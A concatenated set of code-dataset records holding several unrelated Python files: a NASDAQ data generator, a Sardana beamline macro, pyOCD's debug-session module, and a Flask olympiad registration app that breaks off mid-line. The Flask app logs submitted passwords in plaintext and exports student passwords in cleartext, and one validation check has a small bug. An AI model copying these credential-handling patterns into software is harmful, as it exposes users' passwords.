('visibility',)\n\n\n","sub_path":"wadharkka/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"90154169","text":"from __future__ import absolute_import, division, print_function\r\n\r\nimport os\r\n\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\n\r\n# TensorFlow and tf.keras\r\nimport tensorflow as tf\r\nimport random\r\nimport pandas as pd\r\n\r\n# Helper libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom statsmodels.graphics.tsaplots import plot_acf, plot_pacf\r\n\r\n\r\nclass NasdaqGenerator(object):\r\n\r\n def createTestData_nparray(self, data, seqLength, predLength=1):\r\n i = 0\r\n dataX = []\r\n dataY = []\r\n while (i < (len(data) - seqLength - predLength)):\r\n dataX.append(data[i:i + seqLength])\r\n dataY.append(data[i + seqLength:(i + seqLength + predLength)])\r\n i += predLength\r\n\r\n return np.array(dataX), np.array(dataY)\r\n\r\n def createTrainData_nparray(self, data, seqLength, predLength=1):\r\n i = 0\r\n dataX = []\r\n dataY = []\r\n while (i < (len(data) - seqLength - predLength)):\r\n dataX.append(data[i:i + seqLength])\r\n dataY.append(data[i + seqLength:(i + seqLength + predLength)])\r\n i += 1\r\n\r\n return np.array(dataX), np.array(dataY)\r\n\r\n def normalize(self, data):\r\n numerator = data - np.min(data, 0)\r\n denominator = np.max(data, 0) - np.min(data, 0)\r\n return numerator / (denominator + 1e-7)\r\n\r\n def standardize(self, data):\r\n m = np.mean(data)\r\n stdev = np.std(data)\r\n return (data - m) / stdev\r\n\r\n def deStandardize(self, prevData, currentData):\r\n m = np.mean(prevData)\r\n stdev = np.std(prevData)\r\n return currentData * stdev + m\r\n\r\n def DeNormalize(self, prevData, currentData):\r\n min = np.min(prevData, 0)\r\n denominator = np.max(prevData, 0) - np.min(prevData, 0)\r\n return currentData * denominator + min\r\n\r\n def getMinTimeStep(self, data):\r\n min = data[0].shape[0]\r\n for i in range(len(data)):\r\n if (min > data[i].shape[0]):\r\n min = data[i].shape[0]\r\n return min\r\n\r\n def get_delta(self, Y):\r\n Y_shiftright = np.concatenate(([Y[0]], Y), axis=0)\r\n Y_shiftright = np.delete(Y_shiftright, len(Y) - 1, axis=0)\r\n return np.subtract(Y_shiftright, Y)\r\n\r\n def __init__(self, train_ratio, seq_length, output_count, batch_size):\r\n\r\n nasdaq100_small_raw = pd.read_csv(\r\n filepath_or_buffer=\"D:/Projects/tensor2/NASDAQ100/nasdaq100/small/nasdaq100_padding.csv\")\r\n dataset = []\r\n\r\n for i in range(len(nasdaq100_small_raw.values[0])):\r\n temp = nasdaq100_small_raw.values[:, i]\r\n dataset.append(temp)\r\n dataset = np.stack(dataset, axis=1)\r\n # dataset = np.reshape(dataset, [dataset.shape[0], dataset.shape[1], 1])\r\n print(dataset.shape)\r\n self.dataset = dataset\r\n dataset = np.diff(dataset, axis=0)\r\n plt.plot(dataset[:1000, -1])\r\n plt.show()\r\n plot_acf(dataset[:1000, -1])\r\n plt.show()\r\n\r\n train_size = int(len(dataset) * train_ratio)\r\n train_dataset = dataset[:train_size]\r\n test_dataset = dataset[train_size:]\r\n\r\n self.trainX, self.trainY = self.createTrainData_nparray(train_dataset, seq_length, output_count)\r\n self.testX, self.testY = self.createTestData_nparray(test_dataset, seq_length, output_count)\r\n\r\n self.batch_size = batch_size\r\n self.input_dim = self.trainX.shape[1:] # dimension of inputs\r\n self.output_dim = self.trainY.shape[1:]\r\n\r\nif __name__ == \"__main__\":\r\n a = 
NasdaqGenerator(0.8, 64, 8, 16)\r\n","sub_path":"DataCookers/NASDAQ100dataset.py","file_name":"NASDAQ100dataset.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"634441439","text":"from sardana.macroserver.macro import Macro, Type\nimport time\nimport taurus\n\nclass get_oav_iba_beam(Macro):\n \"\"\"Save fitted oav iba beam in bl13 variables\"\"\"\n \n def run(self):\n oav_iba = taurus.Device('bl13/eh/oav-01-iba')\n bl13vars = taurus.Device('bl13/ct/variables')\n \n if oav_iba.XProjFitConverged and oav_iba.YProjFitConverged:\n XProjFitCenter = oav_iba.XProjFitCenter\n YProjFitCenter = oav_iba.YProjFitCenter\n XProjFitFWHM = oav_iba.XProjFitFWHM\n YProjFitFWHM = oav_iba.YProjFitFWHM\n # Center should be relative to center not to the origin\n # Because changing zoom should not\n else:\n self.warning('beam not fitted')\n","sub_path":"ALBA_BL13_XALOC_USER_MACROS/oav_iba.py","file_name":"oav_iba.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"601693928","text":"# pyOCD debugger\n# Copyright (c) 2018-2020 Arm Limited\n# SPDX-License-Identifier: Apache-2.0\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\nimport logging.config\nimport six\nimport yaml\nimport os\nimport weakref\n\n# inspect.getargspec is deprecated in Python 3.\ntry:\n from inspect import getfullargspec as getargspec\nexcept ImportError:\n from inspect import getargspec\n\nfrom . import exceptions\nfrom .options_manager import OptionsManager\nfrom ..board.board import Board\nfrom ..utility.notification import Notifier\n\nLOG = logging.getLogger(__name__)\n\n## @brief Set of default config filenames to search for.\n_CONFIG_FILE_NAMES = [\n \"pyocd.yaml\",\n \"pyocd.yml\",\n \".pyocd.yaml\",\n \".pyocd.yml\",\n ]\n\n## @brief Set of default user script names to search for.\n_USER_SCRIPT_NAMES = [\n \"pyocd_user.py\",\n \".pyocd_user.py\",\n ]\n\nclass Session(Notifier):\n \"\"\"! @brief Top-level object for a debug session.\n \n This class represents a debug session with a single debug probe. It is the root of the object\n graph, where it owns the debug probe and the board objects.\n \n Another important function of this class is that it contains a dictionary of session-scope\n options. These would normally be passed in from the command line. Options can also be loaded\n from a config file.\n\n Precedence for session options:\n \n 1. Keyword arguments to constructor.\n 2. _options_ parameter to constructor.\n 3. Probe-specific options from a config file.\n 4. General options from a config file.\n 5. 
_option_defaults_ parameter to constructor.\n \n The session also tracks several other objects:\n - @ref pyocd.gdbserver.gdbserver.GDBServer \"GDBServer\" instances created for any cores.\n - @ref pyocd.probe.tcp_probe_server.DebugProbeServer \"DebugProbeServer\".\n - The user script proxy.\n \n See the @ref pyocd.core.helpers.ConnectHelper \"ConnectHelper\" class for several methods that\n make it easy to create new sessions, with or without user interaction in the case of multiple\n available debug probes. A common pattern is to combine @ref \n pyocd.core.helpers.ConnectHelper.session_with_chosen_probe()\n \"ConnectHelper.session_with_chosen_probe()\" and a **with** block.\n \n A Session instance can be used as a context manager. The session will, by default, be\n automatically opened when the context is entered. And, of course, it will be closed when the\n **with** block is exited (which is harmless if the session was never opened). If you wish to\n disable automatic opening, set the `auto_open` parameter to the constructor to False. If an\n exception is raised while opening a session inside a **with** statement, the session will be\n closed for you to undo any partial initialisation.\n \"\"\"\n \n ## @brief Weak reference to the most recently created session.\n _current_session = None\n \n @classmethod\n def get_current(cls):\n \"\"\"! @brief Return the most recently created Session instance or a default Session.\n \n By default this method will return the most recently created Session object that is\n still alive. If no live session exists, a new default session will be created and returned.\n That at least provides access to the user's config file(s).\n \n Used primarily so code that doesn't have a session reference can access session options. This\n method should only be used to access options that are unlikely to differ between sessions,\n or for debug or other purposes.\n \"\"\"\n if cls._current_session is not None:\n return cls._current_session()\n else:\n return Session(None)\n\n def __init__(self, probe, auto_open=True, options=None, option_defaults=None, **kwargs):\n \"\"\"! @brief Session constructor.\n \n Creates a new session using the provided debug probe. Session options are merged from the\n _options_ parameter and any keyword arguments. Normally a board instance is created that can\n either be a generic board or a board associated with the debug probe.\n \n Note that the 'project_dir' and 'config' options must be set in either keyword arguments or\n the _options_ parameter.\n \n Passing in a _probe_ that is None is allowed. This is useful to create a session that operates\n only as a container for session options. In this case, the board instance is not created, so the\n #board attribute will be None. Such a Session cannot be opened.\n \n @param self\n @param probe The @ref pyocd.probe.debug_probe. \"DebugProbe\" instance. May be None.\n @param auto_open Whether to automatically open the session when used as a context manager.\n @param options Optional session options dictionary.\n @param option_defaults Optional dictionary of session option values. 
This dictionary has the\n lowest priority in determining final session option values, and is intended to set new\n defaults for option if they are not set through any other method.\n @param kwargs Session options passed as keyword arguments.\n \"\"\"\n super(Session, self).__init__()\n \n Session._current_session = weakref.ref(self)\n \n self._probe = probe\n self._closed = True\n self._inited = False\n self._user_script_namespace = None\n self._user_script_proxy = None\n self._delegate = None\n self._auto_open = auto_open\n self._options = OptionsManager()\n self._gdbservers = {}\n self._probeserver = None\n \n # Set this session on the probe, if we were given a probe.\n if probe is not None:\n probe.session = self\n \n # Update options.\n self._options.add_front(kwargs)\n self._options.add_back(options)\n \n # Init project directory.\n if self.options.get('project_dir') is None:\n self._project_dir = os.getcwd()\n else:\n self._project_dir = os.path.abspath(os.path.expanduser(self.options.get('project_dir')))\n LOG.debug(\"Project directory: %s\", self.project_dir)\n \n # Apply common configuration settings from the config file.\n config = self._get_config()\n probesConfig = config.pop('probes', None)\n self._options.add_back(config)\n\n # Pick up any config file options for this board.\n if (probe is not None) and (probesConfig is not None):\n for uid, settings in probesConfig.items():\n if str(uid).lower() in probe.unique_id.lower():\n LOG.info(\"Using config settings for probe %s\" % (probe.unique_id))\n self._options.add_back(settings)\n \n # Merge in lowest priority options.\n self._options.add_back(option_defaults)\n \n # Logging config.\n self._configure_logging()\n \n # Bail early if we weren't provided a probe.\n if probe is None:\n self._board = None\n return\n \n # Load the user script.\n self._load_user_script()\n \n # Ask the probe if it has an associated board, and if not then we create a generic one.\n self._board = probe.create_associated_board() \\\n or Board(self, self.options.get('target_override'))\n \n def _get_config(self):\n # Load config file if one was provided via options, and no_config option was not set.\n if not self.options.get('no_config'):\n configPath = self.find_user_file('config_file', _CONFIG_FILE_NAMES)\n \n if configPath is not None:\n try:\n with open(configPath, 'r') as configFile:\n LOG.debug(\"Loading config from: %s\", configPath)\n config = yaml.safe_load(configFile)\n if not isinstance(config, dict):\n raise exceptions.Error(\"configuration file %s does not contain a top-level dictionary\"\n % configPath)\n return config\n except IOError as err:\n LOG.warning(\"Error attempting to access config file '%s': %s\", configPath, err)\n \n return {}\n \n def find_user_file(self, option_name, filename_list):\n \"\"\"! 
@brief Search the project directory for a file.\n \n @retval None No matching file was found.\n @retval string An absolute path to the requested file.\n \"\"\"\n if option_name is not None:\n filePath = self.options.get(option_name)\n else:\n filePath = None\n \n # Look for default filenames if a path wasn't provided.\n if filePath is None:\n for filename in filename_list:\n thisPath = os.path.join(self.project_dir, filename)\n if os.path.isfile(thisPath):\n filePath = thisPath\n break\n # Use the path passed in options, which may be absolute, relative to the\n # home directory, or relative to the project directory.\n else:\n filePath = os.path.expanduser(filePath)\n if not os.path.isabs(filePath):\n filePath = os.path.join(self.project_dir, filePath)\n \n return filePath\n \n def _configure_logging(self):\n \"\"\"! @brief Load a logging config dict or file.\"\"\"\n # Get logging config that could have been loaded from the config file.\n config = self.options.get('logging')\n \n # Allow logging setting to refer to another file.\n if isinstance(config, six.string_types):\n loggingConfigPath = self.find_user_file(None, [config])\n \n if loggingConfigPath is not None:\n try:\n with open(loggingConfigPath, 'r') as configFile:\n config = yaml.safe_load(configFile)\n LOG.debug(\"Using logging configuration from: %s\", config)\n except IOError as err:\n LOG.warning(\"Error attempting to load logging config file '%s': %s\", config, err)\n return\n\n if config is not None:\n # Stuff a version key if it's missing, to make it easier to use.\n if 'version' not in config:\n config['version'] = 1\n # Set a different default for disabling existing loggers.\n if 'disable_existing_loggers' not in config:\n config['disable_existing_loggers'] = False\n # Remove an empty 'loggers' key.\n if ('loggers' in config) and (config['loggers'] is None):\n del config['loggers']\n \n try:\n logging.config.dictConfig(config)\n except (ValueError, TypeError, AttributeError, ImportError) as err:\n LOG.warning(\"Error applying logging configuration: %s\", err)\n \n @property\n def is_open(self):\n \"\"\"! @brief Boolean of whether the session has been opened.\"\"\"\n return self._inited and not self._closed\n \n @property\n def probe(self):\n \"\"\"! @brief The @ref pyocd.probe.debug_probe.DebugProbe \"DebugProbe\" instance.\"\"\"\n return self._probe\n \n @property\n def board(self):\n \"\"\"! @brief The @ref pyocd.board.board.Board \"Board\" object.\"\"\"\n return self._board\n \n @property\n def target(self):\n \"\"\"! @brief The @ref pyocd.core.target.soc_target \"SoCTarget\" object representing the SoC.\n \n This is the @ref pyocd.core.target.soc_target \"SoCTarget\" instance owned by the board.\n \"\"\"\n return self.board.target\n \n @property\n def options(self):\n \"\"\"! @brief The @ref pyocd.core.options_manager.OptionsManager \"OptionsManager\" object.\"\"\"\n return self._options\n \n @property\n def project_dir(self):\n \"\"\"! @brief Path to the project directory.\"\"\"\n return self._project_dir\n \n @property\n def delegate(self):\n \"\"\"! @brief An optional delegate object for customizing behaviour.\"\"\"\n return self._delegate\n \n @delegate.setter\n def delegate(self, new_delegate):\n \"\"\"! @brief Setter for the `delegate` property.\"\"\"\n self._delegate = new_delegate\n \n @property\n def user_script_proxy(self):\n \"\"\"! @brief The UserScriptDelegateProxy object for a loaded user script.\"\"\"\n return self._user_script_proxy\n \n @property\n def gdbservers(self):\n \"\"\"! 
@brief Dictionary of core numbers to @ref pyocd.gdbserver.gdbserver.GDBServer \"GDBServer\" instances.\"\"\"\n return self._gdbservers\n \n @property\n def probeserver(self):\n \"\"\"! @brief A @ref pyocd.probe.tcp_probe_server.DebugProbeServer \"DebugProbeServer\" instance.\"\"\"\n return self._probeserver\n \n @probeserver.setter\n def probeserver(self, server):\n \"\"\"! @brief Setter for the `probeserver` property.\"\"\"\n self._probeserver = server\n \n @property\n def log_tracebacks(self):\n \"\"\"! @brief Quick access to debug.traceback option since it is widely used.\"\"\"\n return self.options.get('debug.traceback')\n\n def __enter__(self):\n assert self._probe is not None\n if self._auto_open:\n try:\n self.open()\n except Exception:\n self.close()\n raise\n return self\n\n def __exit__(self, type, value, traceback):\n self.close()\n return False\n \n def _init_user_script_namespace(self, user_script_path):\n \"\"\"! @brief Create the namespace dict used for user scripts.\n \n This initial namespace has only those objects that are available very early in the\n session init process. For instance, the Target instance isn't available yet. The\n _update_user_script_namespace() method is used to add such objects to the namespace\n later on.\n \"\"\"\n import pyocd\n import pyocd.flash.file_programmer\n self._user_script_namespace = {\n # Modules and classes\n 'pyocd': pyocd,\n 'exceptions': pyocd.core.exceptions,\n 'Error': pyocd.core.exceptions.Error,\n 'TransferError': pyocd.core.exceptions.TransferError,\n 'TransferFaultError': pyocd.core.exceptions.TransferFaultError,\n 'Target': pyocd.core.target.Target,\n 'State': pyocd.core.target.Target.State,\n 'SecurityState': pyocd.core.target.Target.SecurityState,\n 'BreakpointType': pyocd.core.target.Target.BreakpointType,\n 'WatchpointType': pyocd.core.target.Target.WatchpointType,\n 'VectorCatch': pyocd.core.target.Target.VectorCatch,\n 'Event': pyocd.core.target.Target.Event,\n 'RunType': pyocd.core.target.Target.RunType,\n 'HaltReason': pyocd.core.target.Target.HaltReason,\n 'ResetType': pyocd.core.target.Target.ResetType,\n 'MemoryType': pyocd.core.memory_map.MemoryType,\n 'MemoryMap': pyocd.core.memory_map.MemoryMap,\n 'RamRegion': pyocd.core.memory_map.RamRegion,\n 'RomRegion': pyocd.core.memory_map.RomRegion,\n 'FlashRegion': pyocd.core.memory_map.FlashRegion,\n 'DeviceRegion': pyocd.core.memory_map.DeviceRegion,\n 'FileProgrammer': pyocd.flash.file_programmer.FileProgrammer,\n 'FlashEraser': pyocd.flash.eraser.FlashEraser,\n 'FlashLoader': pyocd.flash.loader.FlashLoader,\n # User script info\n '__name__': os.path.splitext(os.path.basename(user_script_path))[0],\n '__file__': user_script_path,\n # Objects\n 'session': self,\n 'options': self.options,\n 'LOG': logging.getLogger('pyocd.user_script'),\n }\n \n def _update_user_script_namespace(self):\n \"\"\"! 
@brief Add objects available only after init to the user script namespace.\"\"\"\n if self._user_script_namespace is not None:\n self._user_script_namespace.update({\n 'probe': self.probe,\n 'board': self.board,\n 'target': self.target,\n 'dp': self.target.dp,\n 'aps': self.target.aps,\n })\n \n def _load_user_script(self):\n scriptPath = self.find_user_file('user_script', _USER_SCRIPT_NAMES)\n\n if scriptPath is not None:\n try:\n # Read the script source.\n with open(scriptPath, 'r') as scriptFile:\n LOG.debug(\"Loading user script: %s\", scriptPath)\n scriptSource = scriptFile.read()\n \n self._init_user_script_namespace(scriptPath)\n \n scriptCode = compile(scriptSource, scriptPath, 'exec')\n # Executing the code will create definitions in the namespace for any\n # functions or classes. A single namespace is shared for both globals and\n # locals so that script-level definitions are available within the\n # script functions.\n six.exec_(scriptCode, self._user_script_namespace, self._user_script_namespace)\n \n # Create the proxy for the user script. It becomes the delegate unless\n # another delegate was already set.\n self._user_script_proxy = UserScriptDelegateProxy(self._user_script_namespace)\n if self._delegate is None:\n self._delegate = self._user_script_proxy\n except IOError as err:\n LOG.warning(\"Error attempting to load user script '%s': %s\", scriptPath, err)\n\n def open(self, init_board=True):\n \"\"\"! @brief Open the session.\n \n This method does everything necessary to begin a debug session. It first loads the user\n script, if there is one. The user script will be available via the _user_script_proxy_\n property. Then it opens the debug probe and sets the clock rate from the `frequency` user\n option. Finally, it inits the board (which will init the target, which performs the\n full target init sequence).\n \n @param self\n @param init_board This parameter lets you prevent the board from being inited, which can\n be useful in board bringup situations. It's also used by pyocd commander's \"no init\"\n feature.\n \"\"\"\n if not self._inited:\n assert self._probe is not None, \"Cannot open a session without a probe.\"\n assert self._board is not None, \"Must have a board to open a session.\"\n \n # Add in the full set of objects for the user script.\n self._update_user_script_namespace()\n \n self._probe.open()\n self._closed = False\n self._probe.set_clock(self.options.get('frequency'))\n if init_board:\n self._board.init()\n self._inited = True\n\n def close(self):\n \"\"\"! @brief Close the session.\n \n Uninits the board and disconnects then closes the probe.\n \"\"\"\n if self._closed:\n return\n self._closed = True\n\n LOG.debug(\"uninit session %s\", self)\n if self._inited:\n try:\n self.board.uninit()\n self._inited = False\n except:\n LOG.error(\"exception during board uninit:\", exc_info=self.log_tracebacks)\n \n if self._probe.is_open:\n try:\n self._probe.disconnect()\n except:\n LOG.error(\"probe exception during disconnect:\", exc_info=self.log_tracebacks)\n try:\n self._probe.close()\n except:\n LOG.error(\"probe exception during close:\", exc_info=self.log_tracebacks)\n\nclass UserScriptFunctionProxy(object):\n \"\"\"! @brief Proxy for user script functions.\n \n This proxy makes arguments to user script functions optional. 
\n \"\"\"\n\n def __init__(self, fn):\n self._fn = fn\n self._spec = getargspec(fn)\n \n def __call__(self, **kwargs):\n args = {}\n for arg in self._spec.args:\n if arg in kwargs:\n args[arg] = kwargs[arg]\n self._fn(**args)\n\nclass UserScriptDelegateProxy(object):\n \"\"\"! @brief Delegate proxy for user scripts.\"\"\"\n\n def __init__(self, script_namespace):\n super(UserScriptDelegateProxy, self).__init__()\n self._script = script_namespace\n \n def __getattr__(self, name):\n if name in self._script:\n fn = self._script[name]\n return UserScriptFunctionProxy(fn)\n else:\n raise AttributeError(name)\n","sub_path":"pyocd/core/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":21469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"342690598","text":"import random, re, StringIO, csv, datetime\nfrom flask import Flask, render_template, request, redirect, url_for, make_response, send_file\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom flask.ext.login import login_user, current_user, logout_user\nfrom aioregister.sample_problems import get_sample_problems\nfrom aioregister.school_login import SchoolLogin\nfrom models import db, School, Deleted, Student\nfrom sqlalchemy.ext.automap import automap_base\n\nclass AioRegisterApplication(Flask):\n def __init__(self, *args, **kwargs):\n Flask.__init__(self, __name__, *args, **kwargs)\n with self.open_resource('wordlist.txt') as f:\n self.wordlist = f.read().split()\n with self.open_resource('countries.txt') as f:\n self.countries = f.read().split('\\n')\n\n @self.route('/')\n def index():\n return render_template('index.html', contestlive=self.contest_links_live())\n\n @self.route('/register/', methods=['GET', 'POST'])\n def register():\n if request.method == 'POST':\n \n school = SchoolLogin.get(request.form['username'])\n if school is not None and \\\n (school.school.password == request.form['password'] or \n (school.school.alt_password is not None and school.school.alt_password == request.form['password'])):\n login_user(school, remember=True)\n self.logger.info(\"[Auth] Successful login for '%s' with password '%s'\", request.form['username'], request.form['password'])\n else:\n self.logger.info(\"[Auth] Unsuccessful login for '%s' with password '%s'\", request.form.get('username','UNSPECIFIED'), request.form.get('password','UNSPECIFIED'))\n return render_template('register_login.html', badlogin=True)\n if (current_user.is_authenticated()):\n school = current_user.school\n students = Student.query.filter_by(school_id=school.id).order_by(Student.division, Student.id)\n return render_template('register.html',\n school=school,\n studentInfo=[\"First Name\", \"Last Name\", \"Username\", \"Password\", \"Year\", \"Gender\", \"Email\", \"Division\"],\n students=students,\n contestlive=self.contest_links_live())\n else:\n return render_template('register_login.html')\n\n @self.route('/sample/')\n def sample():\n return render_template('sample_problems.html', sample_problems=get_sample_problems())\n\n @self.route('/testenv/')\n def test_contest_environment():\n return render_template('test_contest_environment.html')\n\n @self.route('/logout/')\n def logout():\n if current_user.is_authenticated():\n self.logger.info('[AUTH] Logout for user %s', current_user.school.username)\n else:\n self.logger.info('[AUTH] Logout for unauthenticated user')\n logout_user()\n return redirect(url_for('index'))\n\n @self.route('/register/student/<int:studentid>/edit/', methods=['GET', 'POST'])\n def 
editstudent(studentid):\n if not current_user.is_authenticated():\n return notauthenticated()\n # ensure student exists and that user has permissions to view student\n student = Student.query.filter_by(id=studentid).first()\n if student is None or student.school_id != current_user.school.id:\n return \"Not your student, or student doesn't exist. Please go back.\"\n\n if request.method == 'POST':\n params = {}\n params['firstname'] = request.form.get('firstname', '').strip()\n params['lastname'] = request.form.get('lastname', '').strip()\n params['year'] = request.form.get('year', '')\n params['gender'] = request.form.get('gender', '')\n params['email'] = request.form.get('email', '').strip()\n params['division'] = request.form.get('division', '')\n if not (params['firstname']):\n return render_template('editstudent.html', message=\"First name must be defined\", **params)\n if not (params['lastname']):\n return render_template('editstudent.html', message=\"Last name must be defined\", **params)\n if not (params['year'] and params['year'].isdigit() and int(params['year']) >= 1 and int(params['year']) <= 12):\n return render_template('editstudent.html', message=\"Year must be a number between 1 and 12\", **params)\n if not (params['gender'] and len(params['gender']) == 1 and params['gender'] in 'UFM'):\n return render_template('editstudent.html', message=\"Gender must be chosen from the drop down menu\", **params)\n if not (params['division'] and len(params['division']) == 1 and params['division'] in 'IS'):\n return render_template('editstudent.html', message=\"Division must be chosen from the drop down menu\", **params)\n if not (params['email'] and re.match(r\"^[A-Z'0-9._%+-]+@[A-Z0-9.-]+\\.[A-Z]{2,4}$\", params['email'], re.IGNORECASE)):\n return render_template('editstudent.html', message='Please enter a valid email address', **params)\n if int(params['year']) >= 11 and params['division']!='S':\n return render_template('editstudent.html', message='Students in year 11 and 12 can only compete in the senior division', **params)\n student.firstname = request.form['firstname']\n student.lastname = request.form['lastname']\n student.year = request.form['year']\n student.gender = request.form['gender']\n student.email = request.form['email']\n student.division = request.form['division']\n db.session.add(student)\n db.session.commit()\n return redirect(url_for('register'))\n\n params = {}\n params[\"firstname\"] = student.firstname\n params[\"lastname\"] = student.lastname\n params[\"year\"] = student.year\n params[\"gender\"] = student.gender\n params[\"email\"] = student.email\n params[\"division\"] = student.division\n for i in params:\n if params[i] == None:\n params[i] = \"\"\n return render_template('editstudent.html', **params)\n\n @self.route('/register/student/add/', methods=['GET', 'POST'])\n def addstudent():\n if not current_user.is_authenticated():\n return notauthenticated()\n\n if request.method == 'POST':\n params = {\"addingpage\":True}\n params['firstname'] = request.form.get('firstname', '').strip()\n params['lastname'] = request.form.get('lastname', '').strip()\n params['year'] = request.form.get('year', '') \n params['gender'] = request.form.get('gender', '') \n params['email'] = request.form.get('email', '').strip()\n params['division'] = request.form.get('division', '')\n if not (params['firstname']):\n return render_template('editstudent.html', message=\"First name must be defined\", **params)\n if not (params['lastname']):\n return render_template('editstudent.html', 
message=\"Last name must be defined\", **params)\n if not (params['year'] and params['year'].isdigit and int(params['year']) >= 1 and int(params['year']) <= 12):\n return render_template('editstudent.html', message=\"Year must be a number between 1 and 12\", **params)\n if not (params['gender'] and len(params['gender']) == 1 and params['gender'] in 'UFM'):\n return render_template('editstudent.html', message=\"Gender must be chosen from the drop down menu\", **params)\n if not (params['division'] and len(params['division']) == 1 and params['division'] in 'IS'):\n return render_template('editstudent.html', message=\"Division must be chosen from the drop down menu\", **params)\n if not (params['email'] and re.match(r\"^[A-Z'0-9._%+-]+@[A-Z0-9.-]+\\.[A-Z]{2,4}$\", params['email'], re.IGNORECASE)):\n return render_template('editstudent.html', message='Please enter a valid email address', **params)\n if int(params['year']) >= 11 and params['division']!='S':\n return render_template('editstudent.html', message='Students in year 11 and 12 can only compete in the senior division', **params)\n uname = self.generate_username(request.form['firstname'], request.form['lastname'])\n student = Student(uname, self.generate_password(),\n current_user.school,\n request.form['firstname'],\n request.form['lastname'],\n request.form['year'],\n request.form['gender'],\n request.form['email'],\n request.form['division'])\n db.session.add(student)\n db.session.commit()\n placetogo = 'register' if request.form.get('another',None) is None else 'addstudent'\n return redirect(url_for(placetogo))\n\n params = {\"addingpage\":True}\n params[\"firstname\"] = \"\"\n params[\"lastname\"] = \"\"\n params[\"year\"] = \"\"\n params[\"gender\"] = \"\"\n params[\"email\"] = \"\"\n params[\"division\"] = \"\"\n for i in params:\n if params[i] == None:\n params[i] = \"\"\n return render_template('editstudent.html', **params)\n\n @self.route('/register/student//delete/')\n def deletestudent(studentid):\n # ensure that user is logged in\n if not current_user.is_authenticated():\n return \"not authenticated\"\n # ensure student exists and that user has permissions to view student\n student = Student.query.filter_by(id=studentid).first()\n if student is None or student.school_id != current_user.school.id:\n return \"not your student, or student doesn't exist\"\n return render_template('deletestudent.html', student=student)\n\n @self.route('/register/student//finaldelete/')\n def deletestudentfinal(studentid):\n # ensure that user is logged in\n if not current_user.is_authenticated():\n return \"not authenticated\"\n # ensure student exists and that user has permissions to view student\n student = Student.query.filter_by(id=studentid).first()\n if student is None or student.school_id != current_user.school.id:\n return \"not your student, or student doesn't exist\"\n db.session.add(Deleted(student.username))\n db.session.delete(student)\n db.session.commit()\n return redirect(url_for('register'))\n\n @self.route('/register/school/edit/', methods=['GET', 'POST'])\n def editschool():\n if not current_user.is_authenticated():\n return notauthenticated()\n cschool = current_user.school\n if request.method == 'POST':\n params = {\"countries\":self.countries}\n params['schoolname'] = request.form.get('schoolname', '') \n params['teachername'] = request.form.get('teachername', '').strip()\n params['email'] = request.form.get('email', '').strip()\n params['phone'] = request.form.get('phone', '') \n if not (params['schoolname']):\n return 
render_template('editschool.html', message=\"School name must be defined\", **params)\n if not (params['teachername']):\n return render_template('editschool.html', message=\"Teacher name must be defined\", **params)\n if not (params['phone']):\n return render_template('editschool.html', message=\"Phone number must be entered\", **params)\n if not (params['email'] and re.match(r\"[A-Z'0-9._%+-]+@[A-Z0-9.-]+\\.[A-Z]{2,4}\", params['email'], re.IGNORECASE)):\n return render_template('editschool.html', message='Please enter a valid email address', **params)\n cschool.school_name = request.form['schoolname']\n cschool.teacher_name = request.form['teachername']\n cschool.email = request.form['email']\n cschool.phone = request.form['phone']\n db.session.add(cschool)\n db.session.commit()\n return redirect(url_for('register'))\n\n params = {\"countries\":self.countries}\n params[\"schoolname\"] = cschool.school_name \n params[\"teachername\"] = cschool.teacher_name \n params[\"email\"] = cschool.email\n params[\"phone\"] = cschool.phone \n for i in params:\n if params[i] == None:\n params[i] = \"\"\n return render_template(\"editschool.html\", school=cschool, **params)\n\n def notauthenticated():\n return \"not authenticated\"\n \n @self.route('/register/school/students.csv')\n def downloadStudents():\n if not current_user.is_authenticated():\n return notauthenticated()\n cschool = current_user.school\n si = StringIO.StringIO()\n cw = csv.writer(si)\n cw.writerow((\"First Name\", \"Last Name\", \"Year\", \"Division\", \"Email\", \"Username\", \"Password\"))\n students = Student.query.filter_by(school_id=cschool.id).order_by(Student.division, Student.id)\n studentData = [(s.firstname, s.lastname, s.year, (\"Intermediate\" if s.division==\"I\" else \"Senior\"), s.email, s.username, s.password) for s in students]\n cw.writerows(studentData)\n output = make_response(si.getvalue())\n output.headers[\"Content-Disposition\"] = \"attachment; filename=AIOstudents.csv\"\n output.headers[\"Content-type\"] = \"text/csv\"\n return output\n\n @self.route('/contest/')\n def contestlisting():\n return render_template(\"contests.html\", contestlive=self.contest_links_live())\n @self.route('/docs/rules.pdf')\n def rulebookpdf():\n return self.pdfresponse('docs/rules.pdf', 'rules')\n\n @self.route('/docs/aio18-int.pdf')\n def aio15intpdf():\n if not current_user.is_authenticated():\n return notauthenticated()\n if not self.contest_links_live():\n return \"Page not found\", 404\n return self.pdfresponse('docs/aio18-int.pdf', 'aio18-int')\n\n @self.route('/docs/aio18-sen.pdf')\n def aio15senpdf():\n if not current_user.is_authenticated():\n return notauthenticated()\n if not self.contest_links_live():\n return \"Page not found\", 404\n return self.pdfresponse('docs/aio18-sen.pdf', 'aio18-sen')\n\n @self.route('/docs/feedback')\n def feedback():\n argusername=request.args.get('username', None)\n argpassword=request.args.get('password', None)\n if argusername is None or argpassword is None:\n return \"invalid username or password\", 403\n student = Student.query.filter_by(username=argusername, password=argpassword).first()\n if student is None:\n return \"invalid username or password\", 403\n zippath = 'docs/feedback/%s.zip' % argusername\n zipname = 